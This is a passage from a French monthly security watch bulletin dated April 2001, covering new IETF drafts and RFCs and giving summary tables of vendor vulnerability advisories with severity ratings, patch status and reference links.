SNMP draft-irtf-nmrg-snmp-compression-01 11/04 SNMP Payload Compression 

SVRLOC draft-day-svrloc-exclusion-01 22/03 Exclusion Extension for Service Location Protocol v2 

TATU draft-cameron-tatu-bibp-03 09/04 Biblio. Protocol Level1: Link Resolution & Metapage Retrieval 

TCP draft-bahk-pilc-tcp-wireless-00 09/04 Spurring TCP retransmission upon wireless uplink losses 

TEWG draft-ietf-tewg-framework-03 05/04 A Framework for Internet Traffic Engineering 

TFRC draft-guo-tsvwg-ctfrc-00 04/04 CTFRC: An enhanced version of TFRC Protocol Specification 

TFTP draft-schulzrinne-tftp-url-00 29/03 The tftp URL Scheme 

ULP draft-williams-tcpulpframe-01 22/03 ULP Framing for TCP 

URN draft-ietf-urn-net-procedures-07 29/03 Assignment Procedures for the URI Resolution using DNS 

USP draft-shemsedinov-usp-01 22/03 Universal Service Protocol 

VCDIFF draft-korn-vcdiff-03 03/04 The VCDIFF Generic Differencing and Compression Data Format 

VPIM draft-ietf-vpim-cc-04 02/04 Critical Content of Internet Mail 

WHOIS draft-wesson-whois-export-03 10/04 Whois Export and Exchange Format 

XML draft-blake-wilson-xmldsig-ecdsa-02 30/03 ECDSA with XML-Signature Syntax 



Avril 2001 

NOS COMMENTAIRES 

LES RFC 

RFC 3091 

Pi Digit Generation Protocol 

Ce standard IETF de 6 pages paru en tout début de mois décrit une implémentation (objets ASCII et protocoles) de 

génération de caractères ASCII numériques de type Chargen et appelée PIgen. 

Un tel système permet de diffuser des valeurs numériques correspondant à des décimales de la valeur Pi de façon 

précise ou approximative soit par une application basée sur TCP en mode connecté, soit sur UDP en mode non 

connecté, soit en mode multicast. 

Sous TCP, l’application génère de façon périodique les décimales. Notons que la valeur entière ("3") n’est pas 

générée, car considérée connue de tous. Sous UDP, il s’agit d’un mode de type question/réponse. La requête émise 

doit contenir le numéro de la décimale de Pi requise. La réponse contient 3 éléments : le numéro de la décimale, un 

symbole ":" et la valeur de la décimale requise. 

Dans le service de génération dit "précis", le port applicatif est fixe et est égal à 31415. 

Dans le service de génération dit "approché (ou approximate)", le port applicatif est fixe et est égal à 22007. cette 

valeur est, semble-t-il, faite pour rappeler de façon mnémotechnique que le calcul approximé est basé sur le calcul 

de la division de la valeur "22" par "7". 

Dans le service en mode de diffusion, l’application utilise le protocol UDP et diffuse des blocs aléatoires de valeurs 

numériques correspondant à des décimales de Pi. Le groupe de multicast utilisé est 314.159.265.359. 

Ce document a pour particularité de contenir au moins 2 éléments que nous nous permettons de qualifier 

d’imprécisions majeures. 

La première concerne le calcul en mode dit "approximate". En effet, il aurait été préférable de se baser sur la division 

de "333" par "106", plus précise, qui a pour mérite de fournir les 4 premières décimales correctes (au lieu de 2 dans 

le cas proposé dans la RFC). Dans la logique de la RFC, le port applicatif à utiliser serait plutôt le 333106, tant en 

TCP qu’en UDP. 

La seconde concerne le choix de l’adresse de multicast et posera sans doute des problèmes d’implémentation. En 

effet, il n’est pas précisé quelle était la classe de cette adresse de diffusion : il s’agit d’une erreur surprenante de la 

part de l’IETF sachant que 3 des 4 valeurs numériques de cette adresse sont hors normes … 

D'une lecture pourtant simple et compréhensible par la plupart des internautes, il s'agit d'un RFC dont on ne risque 

pas de voir le contenu implémenté tant que les imprécisions ne seront pas corrigées. Comme il est rappelé dans la 

partie "Security Considerations" de ce RFC, il est impératif de se baser sur des serveurs fiables implémentant le 

protocole Pigen, car "the imminent collapse of the Internet is assured if this guideline is not strictly followed" 

Le lecteur voulant réaliser sa propre implémentation du protocole pourra d’ailleurs trouver des éléments concernants 

les décimales de Pi sur le site http://pi.super-computing.org 

ftp://ftp.isi.edu/in-notes/rfc3091.txt 

RFC 3093 

Firewall Enhancement Protocol (FEP) 

Ce standard IETF de 11 pages paru lui aussi en tout début de mois décrit une implémentation permettant de 

véhiculer tout datagramme TCP ou UDP au sein du protocole HTTP. 

L’encapsulation dans le protocole HTTP (TCP sur le port 80) qui passe de façon transparente la quasi totalité des 

firewalls du marché, permettrait de véhiculer n’importe quelle application, même les plus complexes qui utilisent des 

ports appplicatifs utilisés de façon aléatoire. 

Il faut savoir que l’un des auteurs de ce RFC est le célèbre Scott Bradner de l’Université de Harvard, et qu’il semble 

avoir usé de sa notoriété pour convaincre les différents vendeurs de gardes barrières d’implémenter sous peu ce 

protocole, dont le sigle (FEP) en rappellera sans doute un autre aux personnes ayant travaillé il y a une dizaine 

d’années dans le domaine des réseaux (Front End Processor). 

Notons que bien qu'il ne s'agisse ici que d'un texte humoristique, le mécanisme présenté est 'hélas' d'ores et déjà 

utilisé dans le but de court-circuiter les filtres de sécurité mis en place ! 

ftp://ftp.isi.edu/in-notes/rfc3093.txt 

LES DRAFTS 

DRAFT-MONTENEGRO-SUCV-00.TXT 

Statistically Unique and Cryptographically Verifiable Identifiers and Addresses 

Cette proposition de standard répond au problème de la propriété de l'identifiant dans le monde du "mobile IP" dans 



Avril 2001 

IPv6, en l'absence d'une tierce partie de confiance. L'utilisation d'éléments ayant des propriétés de "Statistiquement 

Unique et Cryptographiquement Vérifiable" (Statistically Unique and Cryptographically Verifiable) est suggérée 

pour les identificateurs (SUCV ID's) mais aussi pour les adresses (SUCV Addresses). L'objectif est de parer les 

attaques de type DoS (Denial of Service) ou de "hijacking" et ainsi de redorer le 'Blason' de Mobile IP mis à mal 

dernièrement. 

SUCV Addresses veut répondre aux problèmes de confiance qui se posent dans le domaine du "Mobile IPv6" 

lorsque l'on met en œuvre certains mécanismes comme par exemple le "Binding Updates". En effet dans ce 

mécanisme, c'est le nœud mobile authentifié qui met à jour la table de routage de l'agent. 

Dans cette proposition, on admet qu'aucun nœud ne fait confiance aux autres et que l'on ne dispose ni d'une 

Infrastructure à Clé Publique (ICP ou IGC), ni d'un Centre de Distribution de Clé (Key Distribution Center). Dans une 

telle configuration, comment un nœud peut-il prouver son identité ? 

En utilisant les caractéristiques 'SUCV', l'entité va générer elle-même un bi-clé (clé publique et clé privée associée) 

et signer sa clé publique, qui représente son identité, avec sa clé privée. 

SUCV ID's est le condensé du SUCV et est plus simple à utiliser au niveau protocolaire car il est de taille fixe. Ainsi, 

on peut être sûr que cette information d'identité est unique pour chaque nœud. 

Mais cette notion de SUCV ID's ne donne aucune information sur l'adresse. D'où l'introduction du SUCV Addresses 

sur 128 bits qui respecte les caractéristiques 'SUCV' et se compose pour la première partie de 64 bits correspondant 

au préfixe de routage et pour la seconde partie de 64 bits, 63 bits pour le SUCV ID appelé condensé de l'ID (HID) 

et 1 bit pour le "local/universal bit". 

Une description succincte du protocole est faite dans la proposition ainsi que l'environnement d'application. 

ftp://ftp.nordu.net/internet-drafts/ draft-montenegro-sucv-00.txt 

http://www.idg.net/ic_497484_1794_9-10000.html 

DRAFT-BOSE-SMTP-INTEGRITY-00 

Checking of Message Integrity during SMTP Transactions 

Ce draft propose une extension au protocole SMTP permettant de vérifier l’intégrité des messages reçus et de 

demander le cas échéant le renvoi du message. 

Le protocole SMTP (RFC 821) ne défini aucun mécanisme de vérification des messages lors de leur envoi à travers 

le réseau, ce qui implique le traitement manuel des messages endommagés par le destinataire. 

L’extension proposée nécessite peu de modification des logiciels 

clients/serveurs et permet un traitement automatique des 

erreurs de transmission. 

La méthode consiste à insérer un header 'checksum' au début 

du corps du message, contenant le checksum du contenu du 

corps du message. 

valeur_checksum 

.... corps du message d’origine .... 

Réception SMTP 

Commande 

checksum ? 

Support 

checksum ? 

502 Not implemented 

Le tag TYPE indique ici a taille en bits du checksum utilisé (16 ou 32) 

Chaque transfert de message donne lieu à une vérification du 

checksum. Lorsqu'une erreur est détectée, un nouvel envoi est 

demandé, le nombre de renvois étant idéalement limité à 2 

Réception data 

Réception data 

voire 4. Si toutes ces tentatives échouent, le mail est envoyé 

sans l’information 'checksum'. 

453 Checksum error Oui Erreur ? 

La demande de renvoi nécessite la création d’un nouveau code 

Non 

erreur : 453 Checksum does not match 

250 OK 

La compatibilité avec les équipements ne gérant pas la checksum serait assurée par l’ajout d’une commande 

« checksum » au protocole SMTP, permettant de déterminer si le serveur distant gère le mécanisme checksum. 

ftp://ftp.nordu.net/internet-drafts/draft-bose-smtp-integrity-00.txt 



Oui 

Oui 

Non 

Non 

Pas de support checksum

Avril 2001 

ALERTES 

GUIDE DE LECTURE 

ALERTES ET ATTAQUES 

La lecture des avis publiés par les différents organismes de surveillance ou par les constructeurs n’est pas 

toujours aisée. En effet, les informations publiées peuvent être non seulement redondantes mais aussi 

transmises avec un retard conséquent par certains organismes. Dès lors, deux alternatives de mise en 

forme de ces informations peuvent être envisagées : 

Publier une synthèse des avis transmis durant la période de veille, en classant ceux-ci en fonction de 

l’origine de l’avis, 

Publier une synthèse des avis transmis en classant ceux-ci en fonction des cibles. 

La seconde alternative, pour séduisante quelle soit, ne peut être raisonnablement mise en œuvre étant 

donné l’actuelle diversité des systèmes impactés. En conséquence, nous nous proposons de maintenir une 

synthèse des avis classée par organisme émetteur de l’avis. 

Afin de faciliter la lecture de ceux-ci, nous proposons un guide de lecture sous la forme d'un synoptique 

résumant les caractéristiques de chacun des sources d’information ainsi que les relations existant entre ces 

sources. Seules les organismes, constructeurs ou éditeurs, disposant d’un service de notification officiel et 

publiquement accessible sont représentés. 

Avis Spécifiques Avis Généraux 

Constructeurs Editeurs Indépendants Organismes 

Réseaux Systèmes Systèmes Editeurs 

3Com Compaq 

Cisco 

HP 

IBM 

SGI 

SUN 

Linux 

FreeBSD 

NetBSD 

OpenBSD 

SCO 

Hackers Editeurs Autres 

Microsoft l0pht AXENT BugTraq CERT 

Netscape 

rootshell 



ISS 

@Stake 

Typologies des informations publiées 

US Autres 

CIAC 

Publication de techniques et de programmes d’attaques 

Détails des alertes, techniques et programmes 

Synthèses générales, pointeurs sur les sites spécifiques 

Notifications détaillées et correctifs techniques 

Aus-CERT 

L’analyse des avis peut être ainsi menée selon les trois stratégies suivantes : 

Recherche d’informations générales et de tendances : Lecture des avis du CERT et du CIAC 

Maintenance des systèmes : Lecture des avis constructeurs associés 

Compréhension et anticipation des menaces : Lecture des avis des groupes indépendants 

3Com 

Cisco 

Compaq 

HP 

IBM 

SGI 

SUN 

Aus-CERT 

CERT 

Microsoft BugTraq rootshell AXENT 

Netscape 

CIAC 

@Stake 

l0pht 

ISS 

NetBSD 

OpenBSD 

Xfree86 

Linux 

FreeBSD

Avril 2001 

FORMAT DE LA PRESENTATION 

Les alertes et informations sont présentées classées par sources puis par niveau de gravité sous la forme 

de tableaux récapitulatifs constitués comme suit: 

Présentation des Alertes 

EDITEUR 

TITRE 

Description sommaire 

Gravité Date Informations concernant la plate-forme impactée 

Correction Produit visé par la vulnérabilité Description rapide de la source du problème 

Référence 

URL pointant sur la source la plus pertinente 

Présentation des Informations 

SOURCE 

TITRE 

Description sommaire 

URL pointant sur la source d'information 

SYNTHESE MENSUELLE 

Le tableau suivant propose un récapitulatif du nombre d’avis publiés pour la période courante, l’année en 

cours et l’année précédente. Ces informations sont mises à jour à la fin de chaque période de veille. 

L’attention du lecteur est attirée sur le fait que certains avis sont repris et rediffusés par les différents 

organismes. Ces chiffres ne sont donc représentatifs qu’en terme de tendance et d’évolution. 

Période du 23/03/2001 au 20/04/2001 

Cumul 

Période 2001 2000 

Organisme 17 59 118 

CERT-CA 3 8 22 

CERT-IN 1 3 10 

CIAC 13 48 86 

Constructeurs 9 35 77 

Cisco 4 9 13 

HP 2 16 28 

IBM 2 7 17 

SGI 1 1 12 

Sun 0 2 7 

Editeurs 7 28 155 

Allaire 0 2 32 

Microsoft 5 22 100 

Netscape 1 2 7 

Sco 1 2 16 

Unix libres 26 141 226 

Linux RedHat 10 27 137 

Linux Debian 6 42 66 

Linux Mandr. 6 40 -- 

FreeBSD 4 32 23 

Autres 5 21 38 

@Stake 4 12 10 

Safer 1 5 1 

X-Force 0 4 27 

Cumul 2001 - Constructeurs 

IBM 

20% 

Netscape 

7% 

HP 

45% 

SGI 

3% 



Sun 

6% 

Cumul 2001 - Editeurs 

Microsoft 

79% 

Sco 

7% 

Allaire 

7% 

Cisco 

26% 

Cumul 2000 - Constructeurs 

IBM 

22% 

SGI 

16% 

Sun 

9% 

HP 

36% 

Cumul 2000 - Editeurs 

Netscape 

5% 

Microsoft 

64% 

Sco 

10% 

Cisco 

17% 

Allaire 

21%

Avril 2001 

ALERTES DETAILLEES 

AVIS OFFICIELS 

Les tables suivantes présentent une synthèse des principales alertes de sécurité émises par un organisme 

fiable, par l’éditeur du produit ou par le constructeur de l’équipement. Ces informations peuvent être 

considérées comme fiables et authentifiées. En conséquence, les correctifs proposés, s'il y en a, doivent 

immédiatement être appliqués. 

AKOPIA 

Existence d'un compte d'accès libre sur 'Interchange' 

L'un des comptes d'accès livrés avec les bases de démonstration du logiciel de commerce électronique AKOPIA 

Interchange n'est pas protégé par un mot de passe. 

Forte 26/03 Toute plateforme utilisant AKOPIA Interchange versions4.5.3 à 4.6.3 

Correctif existant Bases de démo. Interchange Compte d'accès non protégé 

Bugtraq 

http://www.securityfocus.com/archive/1/170954 

ALCATEL 

Multiples vulnerabilités dans les modems ADSL Alcatel 

Le CERT publie, sous la référence CA-2001-08, une alerte faisant état de multiples vulnérabilités dans les modems 

ADSL Alcatel. 

Critique 10/04 Alcatel Speed Touch Home ADSL Modem, Alcatel 1000 ADSL Network Termination Device 

Aucun correctif Porte dérobée dans les modems Accès à l'interface 

Transfert 

http://www.transfert.net/fr/cyber_societe/article.cfm?idx_rub=87&idx_art=5090 

CA-2001-08 http://www.cert.org/advisories/CA-2001-08.html 

Vnunet 

http://www.vnunet.fr/actu/article.htm?numero=6197&date=2000-11-06 

FA-2001-08 http://www2.fedcirc.gov/advisories/FA-2001-08.html 

BEA 

Exposition des scripts '.jsp' sous 'WebLogic' 

En soumettant une url particulière à un serveur 'WebLogic', il est possible d'afficher la source des scripts JSP. 

Critique 28/03 WebLogic 5.1.0 SP 6 et Tomcat 4.0-b1 (version courante: 5.1SP8) 

Correctif existant Caractères unicode Non rejet d'URL contenant certains caractères unicode 

Bugtraq 


BEA 

http://commerce.bea.com/downloads/weblogic_server.jsp#wls 

Vulnérabilité unicode dans 'Weblogic' 

Une vulnérabilité dans 'Weblogic Server 6.0' peut conduire un utilisateur à visualiser le contenu des répertoires. 

Forte 26/03 Bea Weblogic Server 6.0 pour Windows NT/2000 (version courante: 6.0SP1) 

Correctif existant Caractères unicode Non rejet d'URL contenant certains caractères unicode 

Bugtraq 


BEA 

http://commerce.bea.com/downloads/weblogic_server.jsp#wls 

CISCO 

Vulnérabilité des concentrateurs 'Cisco VPN 3000' 

Il est possible de redémarrer un concentrateur Cisco VPN de la série 3000 en envoyant un flot de données au port 

SSL ou telnet. 

Forte 28/03 Cisco VPN série 3000 avec firmware inférieur à la version 3.0.00 (modèles 3005, 3015, 3030, 3060 et 3080) 

Correctif existant Connexions SSL ou telnet Non fermeture des connexions 

CSCds90807 http://www.cisco.com/warp/public/707/vpn3k-telnet-vuln-pub.shtml 

Déni de service sur les concentrateurs 'VPN 3000' 

Il est possible de provoquer un déni de service distant, depuis un même segment de réseau local, sur les 

concentrateurs CISCO 'VPN 3000'. 

Forte 12/04 Cisco VPN série 3000 avec firmware inférieur à 2.5.2 (F) (modèles 3005, 3015, 3030, 3060 et 3080) 

Correctif existant Option des paquets IP Mauvaise gestion des paquets malformés 

CSCds92460 http://www.cisco.com/warp/public/707/vpn3k-ipoptions-vuln-pub.shtml 

Vulnérabilité dans les commutateurs 'CSS' (Arrowpoint) 

Un utilisateur non privilégié peut acquérir des droits plus élevés sur les commutateurs 'Cisco Content Services' aussi 

appelés 'Arrowpoint'. 

Forte 04/04 Cisco CSS 11050, 11150 et 11800 utilisant Cisco WebNS (Firmware versions inférieures à 4.01B19s). 

Correctif existant Mode 'debug' Possibilité de passer en mode superviseur 

CSCdt32570 http://www.cisco.com/warp/public/707/arrowpoint-useraccnt-debug-pub.shtml 



Avril 2001 

Déni de service sur les commutateurs 'Catalyst 5000' 

Une vulnérabilité de type déni de service, exploitable à distance, affecte les commutateurs Cisco 'Catalyst 5000'. 

Forte 16/04 Cisco Catalyst série 5000 (modèles 5000, 5002, 5500, 5505,5509, 2901, 2902 et 2926) basés sur les 

versions EARL 1, 1+ et 1++ de Firmware versions 4.5 (11) ou inférieures, 5.5 (6) ou inférieures et 6.1 (2) ou 

inférieures. 

Correctif existant Port STP, trames 802.1x Non rejet des trames à destination d'un port STP bloqué 

CSCdt62732 http://www.cisco.com/warp/public/707/cat5k-8021x-vuln-pub.shtml 

COMPAQ 

Déni de service sur Presario via un ActiveX 

Il est possible d'écrire sur le disque dur d'une victime grâce à un contrôle ActiveX sur Compaq Presario. 

Moyenne 10/04 Microsoft Windows 98, Me 

Correctif existant Fonction 'LogDataListToFile' Ecrasement de fichier 

[SSRT0716] http://www.securityfocus.com/archive/1/175463 

FTP 

Débordement de buffer dans plusieurs serveurs 'ftp' 

Une vulnérabilité de type débordement de buffer, exploitable à distance, affecte plusieurs démons ftp. 

Critique 10/04 Services fournis avec FreeBSD 4.2, OpenBSD 2.8, NetBSD 1.5, HPUX 11, IRIX 6.5.x, Solaris 8, Fujitsu UXP/V. 

Proftpd et Microsoft FTP Service(version 5.0) sont aussi affectés. 

Correctif existant Fonction 'glob()' Débordement de buffer 

CA-2001-07 http://www.cert.org/advisories/CA-2001-07.html 

COVERT-2001-02 http://www.pgp.com/research/covert/advisories/048.asp 

FA-2001-07 http://www2.fedcirc.gov/advisories/FA-2001-07.html 

Gene6 

Vulnérabilités dans le serveur FTP G6 'bulletProof' 

Deux vulnérabilités dans le serveur FTP G6 'bulletProof' permet de collecter des informations sensibles sur les 

fichiers et les partages Netbios. 

Forte 04/04 G6 FTP Server version 2.0 

Correctif existant Commandes 'size' et 'mdtm' Utilisation des commandes au delà des limites imposées 

@Stake 

http://www.atstake.com/research/advisories/2001/index_q2.html#040301-1 

HP 

Débordement de buffer dans le démon ntp 'xntpd' 

Une vulnérabilité de type débordement de buffer, exploitable à distance, affecte le démon ntp 'xntpd' sous HP-UX. 

Critique 07/04 HP-UX versions 10.xx et 11.xx sous HP9000 séries 700 et 800 

Correctif existant Argument 'readvar' Débordement de buffer 

HPSBUX0104-148 http://europe-support.external.hp.com/ 

Défaut de fonctionnalités dans la commande 'newgroup' 

La commande 'newgrp' comporte un défaut dans ses fonctionnalités. 

Moyenne 26/03 HP-UX version 11.11 sur serveurs HP9000 

Correctif existant Commande 'newgrp' Mauvais fonctionnement de la commande 

HPSBUX0103-147 http://europe-support2.external.hp.com/ 

IP FILTER 

Vulnérabilité dans 'IP FILTER' 

Une vulnérabilité dans 'IP FILTER' peut autoriser un utilisateur distant à passer un paquet au travers des filtres. 

Critique 09/04 IP FILTER toutes versions sauf 3.3.22 ou 3.4.17 

Correctif existant Cache de fragments Contournement du filtrage 

Linux Security http://www.linuxsecurity.com/advisories/other_advisory-1265.html 

Bugtraq 


IPLANET 

Débordement de buffer dans 'iWS' 

Un défaut d'implémentation dans la redirection des requêtes HTTP peut autoriser un utilisateur distant à accéder à 

des informations sensibles sur un serveur 'iWS' (iPlanet Web Server). 

Critique 17/04 IPlanet WSE Edition V4.0 et 4.1 sous Solaris 2.6, 7, 8, Windows NT 4.0, 2000, Linux 2.2 et 2.4. 

Correctif existant Défaut d'implémentation Débordement de buffer 

@Stake 




Avril 2001 

LINUX 

Vulnérabilité dans 'NetFilter' 

Il est possible de se connecter à distance en modifiant les entrées 'IPTables'. 

Critique 17/04 Pare-feux utilisant Linux (noyau 2.4.x) avec 'IPTables' 

Correctif existant Fonction 'ip_conntrack_ftp.c' Journalisation de la commande 'PORT' 

Securiteam 

http://www.securiteam.com/unixfocus/Security_flaw_in_Linux_s_IPTables_using_FTP_PORT__Exploit_.html 

Vulnérabilité dans 'ptrace' et 'execve' 

Une vulnérabilité dans 'ptrace' et 'execve' permet d'obtenir un interpréteur de commande sous les droits 'root' en 

local. 

Forte 27/03 Noyaux Linux jusqu'à la version 2.2.18 incluse 

Correctif existant 'ptrace' et 'execve' Conflit d'accès au ressources (race condition) 

Bugqtraq 


Multiples vulnerabilités noyau ('kernel') 

De multiples vulnerabilités affectent les noyaux Debian GNU/Linux 2.2 ainsi que Red Hat 6.2 et 7.0. 

Forte 16/04 Debian GNU Linux 2.2 et Red Hat Linux 6.2 et 7.0 

Correctif existant Noyau Appels système, ptrace/exec, erreurs de conception 

RHSA-2001:047 http://www.redhat.com/support/errata/RHSA-2001-047.html 

DSA-047-1 

http://lists.debian.org/debian-security-announce-01/msg00046.html 

LINUX CALDERA 

Vulnérabilités dans le noyau linux ('kernel') 

Plusieurs vulnérabilités exploitables localement ont été révélées suite à un audit du noyau linux par Caldera. 

Forte 03/04 OpenLinux 2.3 (

Avril 2001 

MICROSOFT 

Débordement de buffer dans 'Visual Studio' 

Il existe une vulnérabilité de type débordement de buffer dans un objet 'DCOM' sous Visual Studio 6.0 Edition 

Enterprise. Celle-ci est exploitable à distance. 

Critique 27/03 Visual Studio 6.0 Edition Enterprise 

Correctif existant 'vbsdicli.exe' (T-SQL debugger) Débordement de buffer 

BindView 

http://razor.bindview.com/publish/advisories/adv_vbtsql.html 

MS01-018 

http://www.microsoft.com/technet/security/bulletin/MS01-018.asp 

Déni de service sur les serveurs 'ISA' 

Le service 'Web Proxy' d'un serveur ISA (Internet Security and Acceleration) est vulnérable à distance à une 

attaque de type déni de service. 

Critique 16/04 Microsoft ISA Server 2000 

Correctif existant Service 'Web Proxy' Mauvaise gestion des requêtes malformées 

MS01-021 


Divulgation de mot de passe 'compression de répertoire' 

Les mots de passe utilisés pour protéger un répertoire lors de sa compression est stocké en clair. 

Forte 29/03 Microsoft Plus! 98 et Microsoft Windows Me 

Correctif existant Stockage des mots de passe Divulgation des mots de passe 

MS01-019 


Exécution de code à distance via 'Internet Explorer' 

Il est possible d'exécuter à distance un binaire via 'Internet Explorer' en usurpant le type MIME d'un courrier 

électronique. 

Forte 30/03 Microsoft Internet Explorer 5.01 et 5.5 

Correctif existant Visualitation des mails HTML Mauvaise interprétation du type MIME 

MS01-020 


Exécution de scripts avec 'WebDAV Service Provider' 

Un utilisateur distant peut provoquer l'exécution de scripts à destination du composant 'WebDAV Service Provider' 

afin d'accéder aux ressources 'WebDAV'. 

Forte 18/04 Microsoft Windows 95, 98, 98 SE, Me, NT 4.0 et 2000 avec 'msdaipp.dll' versions 8.102.1403.0, 

8.103.2402.0 et 8.103.2519.0 uniquement 

Correctif existant 'msdaipp.dll' Appel non autorisé du composant via un script 

MS01-022 


Possible déni de service dans les serveurs 'ISA' 

Il est possible de provoquer un déni de service à distance sur les serveurs 'Internet Security and Acceleration'. 

Moyenne 02/04 Microsoft 'Internet Security and Acceleration' Server pourWindows 2000 

Correctif existant Option 'Event Log Failure' Mauvaise gestion des erreurs 

[def-2001-16] http://www.securityfocus.com/archive/1/173326 

Q284800 

http://support.microsoft.com/support/kb/articles/q284/8/00.ASP 

NCM 

Exposition de données sensibles dans CMS 

CMS 'Content Management System' de la société NCM permet d'interroger une base de données SQL. 

Forte 17/04 NCM Content Management) 

Correctif existant Script 'content.pl' Non vérification des données passées en paramètre 

Securiteam 

http://www.securiteam.com/securitynews/NCM_Content_Management_Vulnerability__SQL_.html 

NETSCAPE 

Débordement de buffer dans 'Netscape SmartDownload' 

Il est possible de provoquer un débordement de buffer, exploitable à distance, via l'application 'Netscape 

SmartDownload'. 

Critique 13/04 Netscape SmartDownload 1.3 

Correctif existant Analyse syntaxique des URLs Débordement de buffer 

@Stake 


Netscape 

http://home.netscape.com/download/smartdownload.html 

NETSCREEN 

Trafic non désiré vers la 'DMZ' sur 'NetScreen' 

Malgré les règles de filtrages, il est possible d'envoyer du trafic non désiré vers la 'DMZ' sur 'NetScreen'. 

Forte 26/03 NetScreen-10s et NetScreen-100s ScreenOS versions 1.64, 1.66, 2.01 et 2.5 

Correctif existant ScreenOS Non blocage du trafic 

NetScreen 




Avril 2001 

NTP 

Débordement de buffer dans le démon 'ntp' 

Une vulnérabilité de type débordement de buffer est exploitable à distance dans le démon 'ntp' (Network Time 

Protocol / port UDP et TCP 123). 

Critique 05/04 'ntp' version jusqu'à la 4.0.99k 

Linux Debian 2.2, RedHat 7.0, FreeBSD 4.2-STABLE, Solaris 2.5.1 (test sur xntpd 3.5f) 

Correctif existant Argument 'readvar' Débordement de buffer 

DSA-045-1 


SA2001-004 http://www.linuxsecurity.com/advisories/netbsd_advisory-1255.html 

Bugtraq 


PDG SOFTWARE 

Vulnérabilité dans 'Shopping Cart' 

Une vulnérabilité exploitable à distance affecte 'Shopping Cart'. 

Moyenne 09/04 PDG Shopping Cart (toute version inférieure à 1.63) 

Correctif existant 'shopper.cgi' Accès au répertoire 'PDG_Cart' 

NIPC 01-007 http://www.nipc.gov/warnings/advisories/2001/01-007.htm 

PGP 

Exécution de code distant via 'PGP' 

Un utilisateur distant peut provoquer l'exécution de code à distance via 'PGP ASCII Armor parser'. 

Critique 09/04 PGP (Pretty Good Privacy) versions 5 à 7.0.4 pour Windows 

Correctif existant PGP ASCII Armor parser Création non sécurisée de fichiers arbitraires 

@Stake 


QUEST 

Vulnérabilité dans 'SharePlex' 

SharePlex (outil de réplication de base Oracle) contient une vulnérabilité autorisant un utilisateur local à lire tout 

fichier présent sur le système. 

Moyenne 03/04 SharePlex version 2.1.3.9 et 2.2.2 (beta) 

Correctif existant Script 'qview' Permissions laxistes lors de la lecture d'un fichier 

Securiteam 

http://www.securiteam.com/securitynews/Security_Hole_Found_in_SharePlex.html 

SAMBA 

Vulnérabilité de type lien symbolique dans 'samba' 

Une vulnérabilité de type lien symbolique affecte localement 'samba' lors de requêtes d'impression à distance. 

Moyenne 18/04 Debian GNU/Linux 2.2 (toutes architectures)Immunix OS 6.2, 7.0-beta et 7.0 

Correctif existant Lien symbolique Création dangeureuse de fichiers temporaires 

Debian 

http://www.linuxsecurity.com/advisories/debian_advisory-1295.html 

IMX-2001-70-016 http://www.securityfocus.com/archive/1/177371 

DSA-048-1 


SCO 

Débordement de buffer dans de nombreuses commandes 

De nombreuses commandes associées aux services d'impression et de mail sont affectées par un débordement de 

buffer. 

Moyenne 12/04 SCO OpenServer versions 5.0.0 à 5.0.6 

Correctif existant Services d'impression et de mail Débordement de buffer 

SCO [SSE072B] ftp://ftp.sco.com/SSE/sse072b.ltr 

Bugtraq 


SUN 

Agent de déni de service distribué 'CARKO' 

Le SANS publie, via le GIAC, une note d'alerte au sujet du nouvel agent de déni de service distribué appelé 

'CARKO'. 

Critique 16/04 Sun Solaris 2.6, 7 et 8 

Correctif existant démon 'snmpXdmid' Outil de déni de service distribué 'CARKO' 

CERT CA-2001-05 http://www.cert.org/advisories/CA-2001-05.html 

SANS 

http://www.sans.org/y2k/carko.htm 



Avril 2001 

WATCHGUARD 

Déni de service dans les pare-feux 'Firebox II' 

Une vulnérabilité de type déni de service, exploitable à distance, affecte les pare-feux 'Firebox II'. 

Forte 05/04 Watchguard Firebox IIFirmware versions inférieures à 4.6 

Correctif existant Protocole Mauvaise gestion d'un important flot de requêtes malformées 


ALERTES NON CONFIRMEES 

Les alertes présentées dans les tables de synthèse suivantes ont été publiées dans diverses listes 

d’information mais n’ont pas encore fait l’objet d’une annonce ou d'un correctif de la part de l'éditeur. Ces 

alertes nécessitent la mise en place d’un processus de suivi et d’observation. 

AXENT 

Vulnérabilité dans 'Raptor' 

Raptor firewall comporte une vulnérabilité dans la redirection des requêtes 'HTTP'. 

Forte 24/03 Raptor firewall 6.5 

Correctif existant Redirection des requêtes HTTP Accès aux ports TCP autorisant HTTP (ports 79-99 / 200-65535) 

Bugtraq 


BINTEC 

Déni de service dans les routeurs 'X4000' 

Une vulnérabilité de type déni de service affecte les routeurs 'X4000' de la société BinTec. 

Moyenne 04/04 BinTec X4000 avec firmware 5.1.6 Patch 10 et inférieurs(bootimage et logicware 1.05) 

Aucun correctif 'nmap' Blocage du routeur lors du sondage 'nmap' 

Bugtraq 


CA 

Vulnérabilité dans 'CCC/Harvest' 

CCC Harvest est un outil utilisé afin de synchroniser et contrôler les accès au code source partagé par une équipe 

de développement. 

Forte 28/03 CCCv5.0 (testé sous Windows 2000) 

Aucun correctif Chiffrement du mot de passe Faiblesse de chiffrement 

Bugtraq 


CFINGERD 

Débordement de buffer dans 'cfingerd' 

Une vulnérabilité de type débordement de buffer, exploitable à distance, affecte 'cfingerd'. 

Forte 13/04 Linux Debian 2.1 et 2.2 (plateforme de test) 

Correctif existant fonction 'syslog()' Débordement de buffer 

Bugtraq 


CISCO 

Déni de service dans 'PIX Firewall 5.1' 

Une vulnérabilité de type déni de service, exploitable à distance, affecte les pare-feux 'PIX Firewall 5.1'. 

Forte 06/04 CISCO PIX Firewall 515 et 520 firmware 5.1.4 

Aucun correctif Authentification aaa Mauvaise gestion d'un trop grand nombre d'authentifications 

Bugtraq 


IBM 

Deux vulnérabilités dans 'Websphere/NetCommerce3' 

Le serveur 'Websphere/NetCommerce3' contient deux vulnérabilités exploitables à distance. 

Forte 15/04 IBM Websphere/NetCommerce3 version 3.1.2 

Aucun correctif Macro 'macro.d2w' Mauvaise gestion des requêtes malformées 

Securityfocus http://www.securityfocus.com/bid/2588 

Securiteam 

http://www.securiteam.com/securitynews/IBM_WebSphere_Vulnerable_to_Two_New_Holes__ExecMacro__D 

oS_.html 

IPLANET 

Exposition de mot de passe dans 'iPlanet Calendar' 

Le nom et mot de passe NAS LDAP sont stockés en clair dans un fichier de configuration dans 'iPlanet Calendar'. 

Forte 18/04 iPlanet calendar server 5.0p2 

Aucun correctif Accès au fichier de configuration Enregistrement en clair du nom et mot de passe NAS LDAPadministrateur 

Bugtraq 




Avril 2001 

LIGHTWAVE 

Attaque de type 'brute-force' sur 'ConsoleServer 3200' 

